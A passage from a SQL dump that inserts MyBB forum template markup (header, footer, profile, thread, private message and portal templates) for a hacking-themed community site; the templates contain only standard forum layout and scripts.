cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder1\"> <tr> <td class=\"trow1\"> <table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\"> <tr> <td>{$pmspacebar}<span class=\"smalltext\"><a href=\"private.php\">{$lang->inbox}</a> | <a href=\"private.php?action=send\">{$lang->compose_message2}</a> | <a href=\"private.php?action=folders\">{$lang->manage_folders}</a> | <a href=\"private.php?action=empty\">{$lang->empty_folders2}</a> | <a href=\"private.php?action=export\">{$lang->export_messages2}</a></span></td> </tr> </table> </td> </tr> </table> <br /> {$limitwarning} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"6\"> <div class=\"float_right\"> <input type=\"text\" name=\"keywords\" value=\"{$lang->enter_keywords}\" onfocus=\"if(this.value == \'{$lang->enter_keywords}\') { this.value = \'\'; }\" onblur=\"if(this.value==\'\') { this.value=\'{$lang->enter_keywords}\'; }\" class=\"textbox\" size=\"25\" /> <input type=\"submit\" class=\"button\" name=\"quick_search\" value=\"{$lang->search_pms}\" /> (<a href=\"private.php?action=advanced_search\">{$lang->advanced_search}</a>)</div> <strong>{$lang->pms_in_folder}</strong></td> </tr> <tr> <td class=\"tcat\" align=\"center\" colspan=\"3\"><span class=\"smalltext\"><strong>{$lang->message_title}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"30%\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$sender}</strong></span></td> <td class=\"tcat\" align=\"right\" width=\"20%\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->date_sent}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"1%\" style=\"white-space: nowrap\"><span class=\"smalltext\"><input name=\"allbox\" title=\"{$lang->check_all}\" type=\"checkbox\" class=\"checkbox checkall\" value=\"{$lang->check_all}\" /></span></td> </tr> {$messagelist} <tr> <td class=\"tfoot\" align=\"right\" colspan=\"6\"> <input type=\"submit\" class=\"button\" name=\"moveto\" value=\"{$lang->move_to}\" /> {$folderoplist} {$lang->or} <input type=\"submit\" class=\"button\" name=\"delete\" value=\"{$lang->delete}\" /> {$lang->selected_messages} </td> </tr> </table> <br /> <div class=\"float_left\">{$multipage}</div> <div class=\"float_right\"> <span class=\"smalltext\"> <strong>{$lang->jump_folder} {$folderjump} <input type=\"submit\" class=\"button\" name=\"hop\" value=\"{$lang->go}\" /> </strong> </span> </div> </td> </tr> </table> <input type=\"hidden\" name=\"action\" value=\"do_stuff\" /> </form> {$footer} </body> </html>', '8', '1501', '', '1343925064'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1955', 'forumbit_depth1_cat', '<div id=\"tabmenu_{$forum[\'fid\']}\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <thead> <tr> <td class=\"thead\" colspan=\"6\"> <div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/{$expcolimage}\" id=\"cat_{$forum[\'fid\']}_img\" class=\"expander\" alt=\"{$expaltext}\" title=\"{$expaltext}\" /></div> <div><strong><a href=\"{$forum_url}\">{$forum[\'name\']}</a></strong> - <small>{$forum[\'description\']}</small></div> </td> </tr> </thead> <tbody style=\"{$expdisplay}\" id=\"cat_{$forum[\'fid\']}_e\"> <tr> <td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->forumbit_forum}</strong></span></td> <td class=\"tcat\" width=\"85\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_threads}</strong></span></td> <td class=\"tcat\" width=\"85\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_posts}</strong></span></td> <td class=\"tcat\" width=\"200\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->forumbit_lastpost}</strong></span></td> </tr> {$sub_forums} </tbody> </table> <br /></div>', '8', '1608', '', '1344010489'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1956', 'forumbit_depth2_forum', '<tr> <td class=\"{$bgcolor}\" align=\"center\" valign=\"top\" width=\"1\"><img src=\"uploads/ficons/{$forum[\'ficon\']}\" alt=\"{$forum[\'name\']}\" /></td> <td class=\"{$bgcolor}\"> <strong><a href=\"{$forum_url}\">{$forum[\'name\']}</a></strong>{$forum_viewers_text}<div class=\"smalltext\">{$forum[\'description\']}{$modlist}{$subforums}</div> </td> <td class=\"{$bgcolor}\" align=\"center\" style=\"white-space: nowrap\">{$threads}{$unapproved[\'unapproved_threads\']}</td> <td class=\"{$bgcolor}\" align=\"center\" style=\"white-space: nowrap\">{$posts}{$unapproved[\'unapproved_posts\']}</td> <td class=\"{$bgcolor}\" align=\"right\" style=\"white-space: nowrap\">{$lastpost}</td> </tr>', '8', '1608', '', '1344010431'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1957', 'header_welcomeblock_member', '<div id=\"panel\"><span style=\"float:right; color: white;\">{$lang->welcome_current_time}</span> {$lang->welcome_back} (<a href=\"{$mybb->settings[\'bburl\']}/usercp.php\" class=\"\"><b><span style=\"color: white;\">{$lang->welcome_usercp}</span></b></a> — <a href=\"{$mybb->settings[\'bburl\']}/member.php?action=logout&amp;logoutkey={$mybb->user[\'logoutkey\']}\"><i><span style=\"color: white;\">{$lang->welcome_logout}</span></i></a> {$modcplink} {$admincplink})<br /> <span style=\"float:right;\"> <a href=\"#\" onclick=\"MyBB.popupWindow(\'{$mybb->settings[\'bburl\']}/misc.php?action=buddypopup\', \'buddyList\', 350, 350);\"><span style=\"color: white;\">{$lang->welcome_open_buddy_list}</span></a> </span> <a href=\"{$mybb->settings[\'bburl\']}/search.php?action=getnew\"><span style=\"color: white;\">{$lang->welcome_newposts}</span></a> | <a href=\"{$mybb->settings[\'bburl\']}/search.php?action=getdaily\"><span style=\"color: white;\">{$lang->welcome_todaysposts}</span></a> | <a href=\"{$mybb->settings[\'bburl\']}/search.php?action=finduser&uid={$mybb->user[\'uid\']}\" class=\"\"><span style=\"color: white;\">View Your Posts</span></a> | <a href=\"{$mybb->settings[\'bburl\']}/search.php?action=finduserthreads&uid={$mybb->user[\'uid\']}\" class=\"\"><span style=\"color: white;\">View Your Threads</span></a> | <a href=\"{$mybb->settings[\'bburl\']}/private.php\"><span style=\"color: white;\">{$lang->welcome_pms}</span></a> {$lang->welcome_pms_usage} </div>', '8', '1608', '', '1350849441'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1958', 'header', '<div id=\"container\"> <a name=\"top\" id=\"top\"></a> <div id=\"header\"> <div class=\"logo\" style=\"margin:0 auto;text-align:center\"><a href=\"{$mybb->settings[\'bburl\']}/index.php\"><img src=\"{$theme[\'logo\']}\" alt=\"{$mybb->settings[\'bbname\']}\" title=\"{$mybb->settings[\'bbname\']}\" /></a></div> <div class=\"menu\"> <ul><center> <li><a href=\"{$mybb->settings[\'bburl\']}/index.php\"><img src=\"{$theme[\'imgdir\']}/toplinks/home.png\" /> Home</a></li> <li><a href=\"{$mybb->settings[\'bburl\']}/upgrade.php\"><img src=\"{$theme[\'imgdir\']}/toplinks/upgrade.png\" />Upgrade</a></li> <li><a href=\"{$mybb->settings[\'bburl\']}/search.php\"><img src=\"{$theme[\'imgdir\']}/toplinks/search.png\" />{$lang->toplinks_search}</a></li> <li><a href=\"{$mybb->settings[\'bburl\']}/memberlist.php\"><img src=\"{$theme[\'imgdir\']}/toplinks/member.png\" />{$lang->toplinks_memberlist}</a></li> <li><a href=\"{$mybb->settings[\'bburl\']}/misc.php?action=help\"><img src=\"{$theme[\'imgdir\']}/toplinks/help.png\" />{$lang->toplinks_help}</a></li> <li><a href=\"{$mybb->settings[\'bburl\']}/contact.php\"><img src=\"{$theme[\'imgdir\']}/toplinks/contact.png\" />Contact</a></li> <center></ul> </div> </div> <hr class=\"hidden\" /> {$welcomeblock} <hr class=\"hidden\" /> <br class=\"clear\" /> <div id=\"content\"> {$pm_notice} {$bannedwarning} {$bbclosedwarning} {$unreadreports}{$moderation_posts} {$pending_joinrequests} <navigation> {$affiliates_header} <br />', '8', '1608', '', '1350855264'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1959', 'footer', '<br /> <div class=\"bottommenu\"> <div class=\"float_right\">{$lang_select}</div> <div> <span class=\"smalltext\"><a href=\"{$mybb->settings[\'contactlink\']}\">{$lang->bottomlinks_contactus}</a> | <a href=\"{$mybb->settings[\'homeurl\']}\">{$mybb->settings[\'homename\']}</a> | <a href=\"#top\">{$lang->bottomlinks_returntop}</a> | <a href=\"#content\">{$lang->bottomlinks_returncontent}</a> | <a href=\"<archive_url>\">{$lang->bottomlinks_litemode}</a> | <a href=\"{$mybb->settings[\'bburl\']}/misc.php?action=syndication\">{$lang->bottomlinks_syndication}</a> | <a href=\"{$mybb->settings[\'bburl\']}/advertisements.php\">Advertise</a></span> | <a href=\"{$mybb->settings[\'bburl\']}/misc.php?action=help&hid=16\">Legal Policies</a></span> </div> </div> </div> <hr class=\"hidden\" /> <div id=\"copyright\"> <div id=\"debug\"><debugstuff></div> <!-- MyBB is free software developed and maintained by a volunteer community. It would be much appreciated by the MyBB Group if you left the full copyright and \"powered by\" notice intact, to show your support for MyBB. If you choose to remove or modify the copyright below, you may be refused support on the MyBB Community Forums. This is free software, support us and we\'ll support you. --> {$lang->powered_by} <a href=\"http://mybb.com\" target=\"_blank\">MyBB{$mybbversion}</a>, &copy; 2002-{$copy_year} <a href=\"http://mybb.com\" target=\"_blank\">MyBB Group</a>. <!-- End powered by --> <br /> <br class=\"clear\" /> <!-- The following piece of code allows MyBB to run scheduled tasks. DO NOT REMOVE -->{$task_image}<!-- End task image code --> {$auto_dst_detection} {$affiliates} </div> </div>', '8', '1608', '', '1346969476'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1960', 'member_profile', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->profile}</title> {$headerinclude} </head> <body> {$header} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder1\"> <tr> <td class=\"trow1\"> <table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tr><td class=\"\" width=\"75%\"> <span class=\"largetext\"><strong>{$formattedname}</strong></span><br /> <span class=\"smalltext\"> ({$usertitle})<br /> {$groupimage} {$userstars}<br /> <br /> <strong>{$lang->registration_date}</strong> {$memregdate}<br /> <strong>{$lang->date_of_birth}</strong> {$membday} {$membdayage}<br /> <strong>{$lang->local_time}</strong> {$localtime}<br /> <strong>{$lang->postbit_status}</strong> {$online_status} </span> </td><td width=\"25%\" align=\"right\" valign=\"middle\">{$avatar}</td></tr></table> </td> </tr> {$awaybit} </table> <br /> <table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"> <tr> <td width=\"50%\" valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td colspan=\"2\" class=\"thead\"><strong>{$lang->users_forum_info}</strong></td> </tr> <tr> <td class=\"trow1\"><strong>{$lang->joined}</strong></td> <td class=\"trow1\">{$memregdate}</td> </tr> <tr> <td class=\"trow2\"><strong>{$lang->lastvisit}</strong></td> <td class=\"trow2\">{$memlastvisitdate} {$memlastvisittime}</td> </tr> <tr> <td class=\"trow1\"><strong>{$lang->total_posts}</strong></td> <td class=\"trow1\">{$memprofile[\'postnum\']} ({$lang->ppd_percent_total})<br /><span class=\"smalltext\">(<a href=\"search.php?action=finduserthreads&amp;uid={$uid}\">{$lang->find_threads}</a> &mdash; <a href=\"search.php?action=finduser&amp;uid={$uid}\">{$lang->find_posts}</a>)</span></td> </tr> <tr> <td class=\"trow2\"><strong>{$lang->timeonline}</strong></td> <td class=\"trow2\">{$timeonline}</td> </tr> {$referrals} {$reputation} {$easyrefer} {$repoco} {$warning_level} </table> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td colspan=\"2\" class=\"thead\"><strong>{$lang->users_contact_details}</strong></td> </tr> <tr> <td class=\"trow1\"><strong>{$lang->homepage}</strong></td> <td class=\"trow1\">{$website}</td> </tr> {$sendemail} <tr> <td class=\"{$bgcolors[\'pm\']}\"><strong>{$lang->pm}</strong></td> <td class=\"{$bgcolors[\'pm\']}\"><a href=\"private.php?action=send&amp;uid={$memprofile[\'uid\']}\">{$lang->send_pm}</a></td> </tr> <tr> <td class=\"{$bgcolors[\'icq\']}\"><strong>{$lang->icq_number}</strong></td> <td class=\"{$bgcolors[\'icq\']}\">{$memprofile[\'icq\']}</td> </tr> <tr> <td class=\"{$bgcolors[\'aim\']}\"><strong>{$lang->aim_screenname}</strong></td> <td class=\"{$bgcolors[\'aim\']}\"><a href=\"javascript:;\" onclick=\"MyBB.popupWindow(\'misc.php?action=imcenter&amp;imtype=aim&amp;uid={$uid}\', \'imcenter\', 450, 300);\">{$memprofile[\'aim\']}</a></td> </tr> <tr> <td class=\"{$bgcolors[\'yahoo\']}\"><strong>{$lang->yahoo_id}</strong></td> <td class=\"{$bgcolors[\'yahoo\']}\"><a href=\"javascript:;\" onclick=\"MyBB.popupWindow(\'misc.php?action=imcenter&amp;imtype=yahoo&amp;uid={$uid}\', \'imcenter\', 450, 300);\">{$memprofile[\'yahoo\']}</a></td> </tr> <tr> <td class=\"{$bgcolors[\'msn\']}\"><strong>{$lang->msn}</strong></td> <td class=\"{$bgcolors[\'msn\']}\"><a href=\"javascript:;\" onclick=\"MyBB.popupWindow(\'misc.php?action=imcenter&amp;imtype=msn&amp;uid={$uid}\', \'imcenter\', 450, 300);\">{$memprofile[\'msn\']}</a></td> </tr> </table> </td> <td><img src=\"{$theme[\'imgdir\']}/pixel.gif\" height=\"1\" width=\"8\" alt=\"\"/></td> <td width=\"50%\" valign=\"top\"> {$profilefields}<!-- Profile_achivements -->{$achivementsprofile}<!-- /Profile_achivements --> {$signature} {$modoptions} {$adminoptions} {$buddy_options} </td> </tr> </table> {$footer} </body> </html>', '8', '1608', '', '1350794045'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1961', 'showthread', '<html> <head> <title>{$thread[\'subject\']}{$google_seo_page}</title> {$headerinclude} <script type=\"text/javascript\"> <!-- var quickdelete_confirm = \"{$lang->quickdelete_confirm}\"; // --> </script> <script type=\"text/javascript\" src=\"jscripts/thread.js?ver=1400\"></script> </head> <body> {$header} {$pollbox} <div class=\"float_left\"> {$multipage} </div> <div class=\"float_right\"> {$selfclose}{$newreply} </div> {$ratethread} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both; border-bottom-width: 0;\"> <tr> <td class=\"thead\" colspan=\"2\"> <div style=\"float: right;\"> <span class=\"smalltext\"><strong><a href=\"showthread.php?mode=threaded&amp;tid={$tid}&amp;pid={$pid}#pid{$pid}\">{$lang->threaded}</a> | <a href=\"showthread.php?mode=linear&amp;tid={$tid}&amp;pid={$pid}#pid{$pid}\">{$lang->linear}</a></strong></span> </div> <div> <strong>{$thread[\'threadprefix\']}{$thread[\'subject\']}</strong> </div> </td> </tr> {$classic_header} </table> <div id=\"posts\"> {$posts} </div> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder1\" style=\"border-top-width: 0;\"> <tr> <td colspan=\"2\" class=\"tfoot\"> {$search_thread} <div> <strong>&laquo; <a href=\"{$next_oldest_link}\">{$lang->next_oldest}</a> | <a href=\"{$next_newest_link}\">{$lang->next_newest}</a> &raquo;</strong> </div> </td> </tr> </table> <div class=\"float_left\"> {$multipage} </div> <div style=\"padding-top: 4px;\" class=\"float_right\"> {$selfclose}{$newreply} </div> <br style=\"clear: both;\" /> {$quickreply} {$threadexbox} {$similarthreads} <br /> <div class=\"float_left\"> <ul class=\"thread_tools\"> <li class=\"printable\"><a href=\"printthread.php?tid={$tid}\">{$lang->view_printable}</a></li> <li class=\"sendthread\"><a href=\"sendthread.php?tid={$tid}\">{$lang->send_thread}</a></li> <li class=\"subscription_{$add_remove_subscription}\"><a href=\"usercp2.php?action={$add_remove_subscription}subscription&amp;tid={$tid}&amp;my_post_key={$mybb->post_code}\">{$add_remove_subscription_text}</a></li> </ul> </div> <div class=\"float_right\" style=\"text-align: right;\"> {$moderationoptions} {$forumjump} </div> <br style=\"clear: both;\" /> {$usersbrowsing} {$footer} </body> </html>', '8', '1608', '', '1350764672'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1962', 'postbit', '{$ignore_bit} <a name=\"pid{$post[\'pid\']}\" id=\"pid{$post[\'pid\']}\"></a> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder1\" style=\"{$post_extra_style} {$post_visibility}\" id=\"post_{$post[\'pid\']}\"> <tbody> <tr> <td class=\"tcat\"> <div class=\"float_left smalltext\"> {$post[\'postdate\']}, {$post[\'posttime\']} <span id=\"edited_by_{$post[\'pid\']}\">{$post[\'editedmsg\']}</span> </div> {$post[\'posturl\']} </td> </tr> <tr> <td class=\"trow1 {$unapproved_shade}\"> <table cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%;\"> <tr> <td class=\"post_avatar\" width=\"1\" style=\"{$post[\'avatar_padding\']}\"> {$post[\'useravatar\']} </td> <td class=\"post_author\"> <strong><span class=\"largetext\">{$post[\'profilelink\']}</span></strong> {$post[\'onlinestatus\']}<br /> <span class=\"smalltext\"> {$post[\'usertitle\']}<br /> {$post[\'userstars\']} {$post[\'groupimage\']} </span> </td> <td class=\"smalltext post_author_info\" width=\"165\"> {$post[\'user_details\']}<!-- postbit_achivements -->{$post[\'achivementspostbit\']}<!-- /postbit_achivements --> </td> </tr> </table> </td> </tr> <tr> <td class=\"trow2 post_content {$unapproved_shade}\"> <span class=\"smalltext\"><strong>{$post[\'icon\']}{$post[\'subject\']} {$post[\'subject_extra\']}</strong></span> <div class=\"post_body\" id=\"pid_{$post[\'pid\']}\"> {$post[\'message\']} </div> {$post[\'attachments\']} {$post[\'signature\']} <div class=\"post_meta\" id=\"post_meta_{$post[\'pid\']}\"> {$post[\'iplogged\']} </div> </td> </tr> <tr> <td class=\"trow1 post_buttons {$unapproved_shade}\"> <div class=\"author_buttons float_left\"> {$post[\'button_email\']}{$post[\'button_pm\']}{$post[\'button_www\']}{$post[\'button_find\']}{$post[\'button_rep\']} </div> <div class=\"post_management_buttons float_right\">{$post[\'button_edit\']}{$post[\'button_quickdelete\']}{$post[\'button_quote\']}{$post[\'button_multiquote\']}{$post[\'button_report\']}{$post[\'button_warn\']}{$post[\'button_reply_pm\']}{$post[\'button_replyall_pm\']}{$post[\'button_forward_pm\']}{$post[\'button_delete_pm\']} </div> </td> </tr> </tbody> </table>{$post[inline_ad]}', '8', '1608', '', '1351470181'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1963', 'memberlist_referrals_bit', '<td class=\"trow1 {$alt_bg}\" align=\"center\">{$user[\'referrals\']}</td>', '8', '1501', '', '1343925064'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1964', 'forumdisplay_newthread', '<a href=\"newthread.php?fid={$fid}\" class=\"postbit\">New Thread</a>', '8', '1608', '', '1343954116'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1986', 'reputation_addlink', '<div class=\"float_right\" style=\"padding-bottom: 4px;\"><a href=\"javascript:MyBB.reputation({$user[\'uid\']});\" class=\"postbit\">Add Rating</a></div>', '8', '1608', '', '1343954196'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1965', 'portal_announcement', '<table cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$icon} <a href=\"{$mybb->settings[\'bburl\']}/{$announcement[\'threadlink\']}\">{$announcement[\'subject\']}</a></strong><span class=\"smalltext float_right\">{$lang->posted_by} {$profilelink}</span></td> </tr> <tr> <td class=\"trow1\" align=\"left\"> <span class=\"smalltext\"> {$anndate} {$anntime} {$numcomments}</span> <span class=\"float_right\"><a href=\"{$mybb->settings[\'bburl\']}/printthread.php?tid={$announcement[\'tid\']}\"><img src=\"{$theme[\'imgdir\']}/printable.gif\" alt=\"{$lang->print_this_item}\" title=\"{$lang->print_this_item}\" /></a>&nbsp;<a href=\"{$mybb->settings[\'bburl\']}/sendthread.php?tid={$announcement[\'tid\']}\"><img src=\"{$theme[\'imgdir\']}/send.gif\" alt=\"{$lang->send_to_friend}\" title=\"{$lang->send_to_friend}\" /></a></span> </td> </tr> <tr> <td class=\"trow1\"> <table border=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\"> <tr> <td class=\"tcat\"> <p> {$message} </p> {$post[\'attachments\']} </td> </tr> </table> </td> </tr> </table> <br />', '8', '1501', '', '1343925064'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1966', 'portal_search', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->search_forums}</strong></td> </tr> <tr> <td class=\"trow1\" align=\"center\"> <form method=\"post\" action=\"{$mybb->settings[\'bburl\']}/search.php\"> <input type=\"hidden\" name=\"action\" value=\"do_search\" /> <input type=\"hidden\" name=\"postthread\" value=\"1\" /> <input type=\"hidden\" name=\"forums\" value=\"all\" /> <input type=\"hidden\" name=\"showresults\" value=\"threads\" /> <input type=\"text\" class=\"textbox\" name=\"keywords\" style=\"width:130px;\" value=\"\" /> {$gobutton} </form> <span class=\"smalltext\"> (<a href=\"{$mybb->settings[\'bburl\']}/search.php\">{$lang->advanced_search}</a>) </span> </td> </tr> </table> <br />', '8', '1501', '', '1343925064'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1967', 'portal_welcome_guesttext', '<span class=\"smalltext\">You have to <a href=\"{$mybb->settings[\'bburl\']}/member.php?action=register\">register</a> before you can post on {$mybb->settings[\'homename\']}.</span><br /> <br /> <form method=\"post\" action=\"{$portal_url}\"><input type=\"hidden\" name=\"action\" value=\"do_login\" /> {$lang->username}<br />&nbsp;&nbsp;<input type=\"text\" class=\"textbox\" name=\"username\" value=\"\" /><br /><br /> {$lang->password}<br />&nbsp;&nbsp;<input type=\"password\" class=\"textbox\" name=\"password\" value=\"\" /><br /><br /> <label title=\"{$lang->remember_me_desc}\"><input type=\"checkbox\" class=\"checkbox\" name=\"remember\" value=\"yes\" /> {$lang->remember_me}</label><br /><br /> <br /><input type=\"submit\" class=\"button\" name=\"loginsubmit\" value=\"{$lang->login}\" /></form>', '8', '1501', '', '1343925064'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1968', 'portal_latestthreads_thread', '<tr> <td class=\"{$altbg}\" colspan=\"2\"> <strong><a href=\"{$mybb->settings[\'bburl\']}/{$thread[\'threadlink\']}\">{$thread[\'subject\']}</a></strong> <span class=\"smalltext\"><br /> <em>{$lang->latest_threads_lastpost}</em> {$lastposterlink}<br /> {$lastpostdate} {$lastposttime}<br /> </span> </td> </tr> <tr> <td class=\"tcat\"> <strong>&raquo; </strong>{$lang->latest_threads_replies} {$thread[\'replies\']} <td class=\"tcat\" width=\"50%\"> <strong>&raquo; </strong>{$lang->latest_threads_views} {$thread[\'views\']} </td> </td> </tr>', '8', '1501', '', '1343925064'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1969', 'portal_latestthreads', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->latest_threads}</strong></td> </tr> {$threadlist} </table> <br />', '8', '1501', '', '1343925064'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1970', 'portal_stats', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->forum_stats}</strong></td> </tr> <tr> <td class=\"trow1\"> <span class=\"smalltext\"> <strong>&raquo; </strong>{$lang->num_members} {$stats[\'numusers\']}<br /> <strong>&raquo; </strong>{$lang->latest_member} {$newestmember}<br /> <strong>&raquo; </strong>{$lang->num_threads} {$stats[\'numthreads\']}<br /> <strong>&raquo; </strong>{$lang->num_posts} {$stats[\'numposts\']} <br /> </span> </td> </tr> <tr> <td class=\"trow1\"> <a href=\"{$mybb->settings[\'bburl\']}/stats.php\">{$lang->full_stats}</a> </td> </tr> </table> <br />', '8', '1501', '', '1343925064'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1971', 'index', '<html> <head> <meta name=\"msvalidate.01\" content=\"F9F1E0456ECDA85FC21E8A39D6FE1B05\" /> <meta name=\"google-site-verification\" content=\"n7BrYoUd7qjd7Fmg9JTLrSav2luYahk1wNoYmfGZTZc\" /> <!-- bErhCCcakhu0PAUUPsq_ZjLtZ24 --> <title>{$mybb->settings[\'bbname\']}</title> {$headerinclude} <script type=\"text/javascript\"> <!-- lang.no_new_posts = \"{$lang->no_new_posts}\"; lang.click_mark_read = \"{$lang->click_mark_read}\"; // --> </script> </head> <body> {$header}{$tabmenu} {$forums} <script type=\"text/javascript\"> <!--// var myflowers=new ddtabcontent(\"menutabs\") myflowers.setpersist(true) myflowers.init() --> </script> {$boardstats} <table class=\"tborder\"> <tr> <td height=\"34px\" class=\"thead\" colspan=\"1\">&nbsp;<strong>Social Networking</strong></td> </tr> <td class=\"trow1\" style=\"height: 36px\"> <div style=\"margin-top: 4px;\">&nbsp; <a href=\"http://www.alexa.com/siteinfo/l33thacking.net?p=rwidget#reviews\" ><img src=\'http://www.alexa.com/images/widgets/black/dark/v1-125x60.png\' alt=\'Review l33thacking.net on alexa.com\' /></a>&nbsp;&nbsp;&nbsp; <a href=\"https://www.facebook.com/L33tHacking\"target=\"_blank\"><img id=\"facebook\" title=\"Like us on Facebook\" src=\"images/CoderGreen/sn/facebook.png\" /></a>&nbsp;&nbsp;&nbsp; <a href=\"http://twitter.com/l33thackingnet\" target=\"_blank\">&nbsp;<img id=\"Twitter\" title=\"Follow us on Twitter\" src=\"images/CoderGreen/sn/Twitter.png\" />&nbsp;</a>&nbsp;&nbsp;&nbsp; <a href=\"misc.php?action=syndication\" target=\"_blank\">&nbsp;<img id=\"rss\" title=\"Get our rss Feed\" src=\"images/CoderGreen/sn/feed.png\" />&nbsp;&nbsp;</a> <script type=\"text/rocketscript\"> (function() { var po = document.createElement(\'script\'); po.type = \'text/javascript\'; po.async = true; po.src = \'https://apis.google.com/js/plusone.js\'; var s = document.getElementsByTagName(\'script\')[0]; s.parentNode.insertBefore(po, s); })(); </script> <div style=\"float: right;width: 70px; height: 25px\"><g:plusone></g:plusone></div> </div> </td> </tr> </table> {$footer} </body> </html>', '8', '1608', '', '1351754722'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1972', 'postbit_email', '<a href=\"member.php?action=emailuser&amp;uid={$post[\'uid\']}\" class=\"postbit\">Email</a>', '8', '1608', '', '1343953519'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1973', 'postbit_delete_pm', '<a href=\"private.php?action=delete&amp;pmid={$id}&amp;my_post_key={$mybb->post_code}\" class=\"postbit\">Delete</a>', '8', '1608', '', '1343953573'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1974', 'postbit_edit', '<a href=\"editpost.php?pid={$post[\'pid\']}\" id=\"edit_post_{$post[\'pid\']}\" class=\"postbit\">Edit</a> <div id=\"edit_post_{$post[\'pid\']}_popup\" class=\"popup_menu\" style=\"display: none;\"><div class=\"popup_item_container\"><a href=\"javascript:;\" onclick=\"Thread.quickEdit({$post[\'pid\']});\" class=\"popup_item\">{$lang->postbit_quick_edit}</a></div><div class=\"popup_item_container\"><a href=\"editpost.php?pid={$post[\'pid\']}\" class=\"popup_item\">{$lang->postbit_full_edit}</a></div></div> <script type=\"text/javascript\"> // <!-- if(use_xmlhttprequest == \"1\") { new PopupMenu(\"edit_post_{$post[\'pid\']}\"); } // --> </script>', '8', '1608', '', '1343953606'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1975', 'postbit_find', '<a 